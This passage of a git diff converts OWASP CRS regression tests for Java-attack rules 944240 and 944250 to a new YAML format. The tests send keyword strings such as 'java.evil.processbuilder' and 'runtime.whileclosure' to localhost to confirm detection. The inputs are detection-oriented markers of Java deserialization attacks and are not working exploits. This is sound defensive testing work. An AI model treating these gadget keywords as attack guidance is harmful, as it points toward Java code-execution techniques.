output: - log_contains: "id \"944240\"" - - test_title: 944240-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 73 desc: "XML element value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log: + expect_ids: [944240] + - test_id: 74 desc: "Nested XML element value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log: + expect_ids: [944240] + - test_id: 75 desc: "Content-Type text/plain includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log: + expect_ids: [944240] + - test_id: 76 desc: "Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.prototypeserializationfactory\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeserializationfactory\"}" + output: + log: + expect_ids: [944240] + - test_id: 77 desc: "Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.prototypeserializationfactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.prototypeserializationfactory\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 78 desc: "Argument test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log: + expect_ids: [944240] + - test_id: 79 desc: "Argument name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure=test" + output: + log: + expect_ids: [944240] + - test_id: 80 desc: "Cookie test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 81 desc: "Cookie name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.whileclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.whileclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 82 desc: "Request header test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 83 desc: "XML attribute value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 84 desc: "XML element value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log: + expect_ids: [944240] + - test_id: 85 desc: "Nested XML element value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log: + expect_ids: [944240] + - test_id: 86 desc: "Content-Type text/plain includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log: + expect_ids: [944240] + - test_id: 87 desc: "Content-Type application/json arg value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.whileclosure\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.whileclosure\"}" + output: + log: + expect_ids: [944240] + - test_id: 88 desc: "Content-Type application/json arg name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.whileclosure\": \"test\"}" - output: - log_contains: "id \"944240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.whileclosure\": \"test\"}" + output: + log: + expect_ids: [944240] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml index b8b744b16..b9aa24729 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml @@ -1,453 +1,451 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944250.yaml" - description: "Positive tests for rule 944250" +rule_id: 944250 tests: - - test_title: 944250-1 + - test_id: 1 desc: "Argument test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log: + expect_ids: [944250] + - test_id: 2 desc: "Argument name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime=test" - output: - log_contains: "id \"944250\"" - - test_title: 944250-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime=test" + output: + log: + expect_ids: [944250] + - test_id: 3 desc: "Cookie test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.evil.runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 4 desc: "Cookie name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.evil.runtime=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.runtime=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 5 desc: "Request header test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.evil.runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 6 desc: "XML attribute value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944250] + - test_id: 7 desc: "XML element value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log: + expect_ids: [944250] + - test_id: 8 desc: "Nested XML element value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log: + expect_ids: [944250] + - test_id: 9 desc: "Content-Type text/plain includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log: + expect_ids: [944250] + - test_id: 10 desc: "Content-Type application/json arg value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.evil.runtime\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.runtime\"}" + output: + log: + expect_ids: [944250] + - test_id: 11 desc: "Content-Type application/json arg name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.evil.runtime\": \"test\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.evil.runtime\": \"test\"}" + output: + log: + expect_ids: [944250] + - test_id: 12 desc: "Argument test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: 